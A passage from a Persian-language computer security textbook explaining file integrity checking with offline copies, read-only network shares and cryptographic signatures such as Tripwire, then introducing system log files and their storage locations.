ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻛﺎﻣﻠﺘﺮﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺳﻴﺴﺘﻢ ﻣﺸﻜﻮﻙ ،ﻫﻤﺎﻥ ﺭﻭﺵ ﺍﻭﻝ ﻣﻲﺑﺎﺷﺪ .ﺭﻭﺵ ﺳـﻮﻡ ﺭﺍﻳﺠﺘـﺮﻳﻦ ﺭﺍﻫﻜـﺎﺭ ﺍﻣـﺎ ﺩﺭ ﻋﻤـﻞ
ﻧﺎﻛﺎﻓﻲ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻭﺍﻗﻌﹰﺎ ﻣﻬﺎﺟﻤﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ،ﺑﻪ ﻫﻴﭻ ﭼﻴﺰ ﺁﻥ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ؛ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺷﺎﻣﻞ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ،ﻭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻧﻴﺰ ﻣﻲﺷﻮﺩ.
ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ
ﻳﻚ ﺭﻭﺵ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ،ﮔﺬﺍﺷﺘﻦ ﺁﻧﻬﺎ ﺭﻭﻱ ﺩﻳﺴﻜﻲ ﺩﻳﮕﺮ ﺧﺼﻮﺻﹰﺎ ﺭﺳﺎﻧﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﺍﺳـﺖ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺎ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﺗﻮﺍﻧـﺴﺘﻪﺍﻧـﺪ ﻳﮑﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ
ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ ٣٣٢.ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﻓﺎﻳﻞ ﺧﺎﺻﻲ ﺷﺒﻬﻪﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻳﺪ ،ﺩﻳﺴﻚ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﺩﻳﺴﮏﮔﺮﺩﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ mount ،ﻣﻲﺷـﻮﺩ
ﻭ ﻋﻤﻞ ﻣﻘﺎﻳﺴﻪ ﺍﻧﺠﺎﻡ ﻣﻲﭘﺬﻳﺮﺩ .ﺍﮔﺮ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﻳﻦ ﺩﻳﺴﻜﻬﺎ ﺩﻗﺖ ﻛﺎﻓﻲ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻣﺰﻳـﺖ ﺑـﺎ ﺍﺭﺯﺵ ﺑﻬـﺮﻩﻣﻨـﺪ
ﺷﻮﻳﺪ ﻛﻪ ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺭ ﺍﺛﺮ ﻳﻚ ﺣﻤﻠﻪ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺩﺳﺘﻜﺎﺭﻱ ﺷﻮﺩ ﻳﻚ ﻧﺴﺨﺔ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺭﺍ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ .ﺍﻧﺠﺎﻡ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻨﻈﻢ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻳﺎ ﻳﻜﺒﺎﺭ ﻧﻮﺷﺘﻨﻲ ﻣﺜﻞ ﻧﻮﺍﺭﻫﺎ ﻭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻧﻴـﺰ ﺍﺯ ﻫﻤـﻴﻦ
ﻣﺰﺍﻳﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ.
ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻧﺴﺨﻪﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ،ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻗﺴﻤﺖ ﺩﻳﮕﺮﻱ ﺍﺯ ﺩﻳﺴﻚ ﻣﻲﺑﺎﺷﺪ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﻧـﺴﺨﻪ
ﺭﺍ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭ ﻳﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﺗﺎ ﺣﺠﻢ ﺩﻳﺴﻚ ﻣﺼﺮﻓﻲ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ ﻭ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ ﻧﻴـﺰ ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈـﺖ ﻧﻤﺎﻳﻴـﺪ.
ﺍﺷﻜﺎﻝ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ ،ﺑﻪ ﭘﺮﺩﺍﺯﺵ ﺍﺿﺎﻓﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻜﺒﺎﺭ ﺩﺭ ﺭﻭﺯ )ﻳـﺎ ﺑـﻴﺶ ﺍﺯ
ﺁﻥ( ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺖ ﺍﺿﺎﻓﻪ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑـﺎﺭ ﺑﻴـﺎﻭﺭﺩ .ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻧﻤـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ.
۳۳۱ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ -ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ -ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﺓ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﻧﻤﻲﺩﻫﻨﺪ.
۳۳۲ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﺗﻮﺻﻴﻒ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻣﺒﺘﻨﻲ ﺑﺮ firewireﺧﺎﺭﺟﻲ ﻣﻲﺑﺎﺷﺪ.
٤٢٥ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺁﻥ partitionﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NFSﻳﺎ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻣﺸﺎﺑﻪ ،ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ ﺑـﻪﺍﺷـﺘﺮﺍﻙ
ﺑﮕﺬﺍﺭﻳﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ﺗﻤﺎﻡ ﻣﺸﺘﺮﻳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻥ partitionﺭﺍ mountﻛﻨﻨﺪ ﻭ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺟﺎﻣﻌﻴﺖ ﻧـﺴﺨﻪﻫـﺎﻱ
ﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﺩﺍﺷـﺘﻪ
ﻣﺤﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ .ﺍﻟﺒﺘﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠ ﹺ
ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺍﺯ ﺩﻳﺴﻚ ﻣﺤﻠﻲ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﺪ ﻛﻪ ﻫﻴﭻ ﺗﻐﻴﻴﺮﻱ ﮔﺰﺍﺭﺵ ﻧﺸﻮﺩ.
ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺷﺒﻜﻪ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ " "rdistﺍﺳﺖ .ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ
ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ؛ ﺑﻠﻜﻪ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻـﻠﻲ ﺧـﻮﺩ ﻣﻘﺎﻳـﺴﻪ
ﺷﻮﻧﺪ.
ﺳﺮﺟﻤﻊﻫﺎ ﻭ ﺍﻣﻀﺎﻫﺎ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺎ ﻛﻤﻲ ﺗﻼﺵ ﻣﻲﺗﻮﺍﻥ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺳﺎﺩﺓ ﻛﻨﺘﺮﻟﻲ ﺭﺍ ﻣﻐﻠﻮﺏ ﻛﺮﺩ .ﻣـﻲﺗـﻮﺍﻥ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺩﺳـﺘﻜﺎﺭﻱ ﻛـﺮﺩ ﻛـﻪ ﺗﻐﻴﻴـﺮﺍﺕ
ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻧﺸﻮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻳﻚ ﻓﺎﻳﻞ ﻣﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﺍﻧـﺴﺘﻦ ﺑﻠـﻮﻙ ﻣـﻮﺭﺩ ﻧﻈـﺮ،
ﻣﺴﺘﻘﻴﻤﹰﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ،ﺭﻭﻱ ﺩﻳﺴﻚ ﻧﻮﺷﺖ .ﭼﻮﻥ ﺗﻐﻴﻴﺮ ﺍﺯ ﻃﺮﻳﻖ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ ،ﻫﻴﭻ ﻳﻚ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﺮﺑﻮﻁ ﺑﻪ ﺯﻣﺎﻥ ﺗﻐﻴﻴﺮ ﻓﺎﻳﻞ ﻋﻮﺽ ﻧﻤﻲﺷﻮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺁﺧـﺮﻳﻦ ﺯﻣـﺎﻥ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ
ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺸﺮﻭﻉ ﺑﺒﺮﺩ ،ﻓﺎﻳﻞ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ،ﻭ ﺳﭙﺲ ﺳﺎﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺯﻣﺎﻥ ﺍﻭﻟﻴﻪ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ.
ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻀﺎ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﻭ ﺍﻣﻀﺎﻫﺎ ﺭﺍ ﺑﺎ ﻫﻢ ﻣﻘﺎﻳﺴﻪ ﻧﻤﻮﺩ .ﻳﻚ ﺍﻣﻀﺎﻱ ﺧﻮﺏ ﺑﺎﻳﺪ ﺑﻪ ﺗﻚ ﺗﻚ
ﺑﻴﺘﻬﺎﻱ ﻓﺎﻳﻞ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻭ ﻳﻚ ﻣﻬﺎﺟﻢ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﻓﺎﻳﻞ ﺩﻳﮕـﺮﻱ ﺑـﺎ ﻫﻤـﺎﻥ ﺍﻣـﻀﺎ ﺗﻮﻟﻴـﺪ ﻛﻨـﺪ .ﺍﻳـﻦ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎ ﺻـﻼﺣﻴﺖ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺳﺎﺩﻩ ﺳﺮﺟﻤﻌﮕﻴﺮﻱ )ﻣﺎﻧﻨﺪ (CRCﺭﺍ ﺯﻳﺮ ﺳﺆﺍﻝ ﻣﻲﺑﺮﻧﺪ ،ﻭﻟﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩ.
ﻻ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨﺪ ﻧﻮﻉ ﺧﻼﺻﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﻫﺮ ﻓﺎﻳـﻞ ﻭ ﻓـﺮﺍﺩﺍﺩﻩﻫـﺎﻳﺶ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺧﻮﺏ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ .ﻭﻗﺘﻲ ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺳﺎﻟﻢ ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﺍﻣﻀﺎﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﺍﺯ ﺍﻣﻀﺎﻫﺎ ﺩﺭ ﻣﺤﻠﻲ ﺍﻣﻦ )ﻣـﺜ ﹰ
ﻼ ﻳـﻚ ﺭﺳـﺎﻧﺔ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﻳـﺎ ﻳﻜﺒـﺎﺭ
ﻧﻮﺷﺘﻨﻲ( ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ ،ﻫﺮ ﺗﻐﻴﻴﺮ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﻣﻀﺎﮔﻴﺮﻱ ﻣﺠﺪﺩ ﻭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺍﻣﻀﺎﻱ ﺁﻥ ﻧﺴﺨﺔ ﺳﺎﻟﻢ ﺑﺮﺍﺣﺘـﻲ ﺗـﺸﺨﻴﺺ ﺩﺍﺩ.
ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭼﻨﺪﺑﺴﺘﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ (http://www.tripwire.com) Tripwireﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﻭ ﻣﺘﻦﺑﺎﺯ ﺁﻥ
ﺩﺭ Linuxﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﺪ.
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ
ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ ،ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻣﻲﺷﻮﺩ .ﺭﺧﺪﺍﺩﻫﺎﻱ ﻗﺎﺑﻞ ﺛﺒﺖ ﻳﺎ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺛﺒﺘﻲ ،٣٣٥ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻳـﺎ ﺷـﺮﻭﻁ
ﺧﺎﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺯﺵ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﺩﺍﺭﻧﺪ .ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻳﻜﻲ ﺍﺯ ﻋﻨﺎﺻﺮ ﻣﻬﻢ ﺗﺸﻜﻴﻞﺩﻫﻨﺪﺓ ﻳﻚ ﺳﻴـﺴﺘﻢ
ﺍﻣﻦ ﻫﺴﺘﻨﺪ :ﺑﺎ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﻳﻚ ﺗﺎﺭﻳﺨﭽﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺳﻠﺴﻠﺔ ﻣﻤﻴﺰﻱ ﺍﺯ ﮔﺬﺷﺘﺔ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﻛـﻪ ﺭﺩﻳـﺎﺑﻲ ﻣـﺸﻜﻼﺕ ﻭ ﺣﻤـﻼﺕ ﺭﺍ
ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻗﻄﻌﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻛﻨﺎﺭ ﻫﻢ ﺑﮕﺬﺍﺭﻳﺪ ﻭ ﺩﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ ،ﻣﺒـﺪﺃ ﻳـﻚ
ﻧﻔﻮﺫ ،ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﺻﺪﻣﺎﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﻛﺸﻒ ﻛﻨﻴﺪ .ﺩﺭ ﻣﻮﺍﺭﺩﻳﻜﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺟﻠﻮﻱ ﺻﺪﻣﺎﺕ ﺭﺍ ﺑﮕﻴﺮﻳـﺪ ﺣـﺪﺍﻗﻞ ﺳـﺎﺑﻘﻪﺍﻱ ﺍﺯ ﺁﻧـﺮﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ .ﺁﻥ ﺛﺒﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﭼﻴﺰﻱ ﺑﺎﺷﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺑﺎﺯﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ،ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ،ﺷﻬﺎﺩﺕ ﺩﺍﺩﻥ ﺩﺭ
ﺩﺍﺩﮔﺎﻩ ،ﻳﺎ ﮔﺮﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﺷﺮﮐﺖ ﺑﻴﻤﻪ ﻻﺯﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺫﺧﻴﺮﺓ ﺛﺒﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ:
ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺭﺧﺪﺍﺩ ﺭﻭﻱ ﺁﻥ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺫﺧﻴﺮﻩ ﻛﺮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ Unixﺛﺒﺘﻬـﺎ ﺩﺭ •
ﺷﺎﺧﺔ /var/logﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ ،ﻫﺮﭼﻨﺪ ﺑﻌﻀﻲ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺷﺮﺍﻳﻂ ﺧﺎﺹ ﺍﺯ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺒﺘﻨﻲ ﺑﺮ Windows NTﭘﻴﺎﻣﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ ﻭﺍﺣﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ )ﻣﻌﻤﻮ ﹰ
ﻻ ﺩﺭ
ﻓﺎﻳﻞ (C:\WINNT\system32\config\SysEvent.Evt؛ ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﺑﺴﺘﺮﻫﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻨﻔـﺮﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ
ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﻣﻲﺗﻮﺍﻥ ﺛﺒﺘﻬﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻓﺮﺳﺘﺎﺩ ﺗﺎ ﻫﻤﮕﻲ ﺑﺼﻮﺭﺕ ﻳﻜﺠﺎ ﻭ ﺩﺭﮐﻨﺎﺭ ﻫﻢ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺭﺍﻳﺎﻧـﺔ ﺭﺍﻩ •
ﺩﻭﺭ ﻛﻪ ﮔﺎﻫﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒﺖ ٣٣٦ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺤﻞ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺭﻭﻱ
ﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛـﺮﺩ ﻛـﻪ ﻳﻚ ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﺭﻭﺩ .ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗ ﹺ
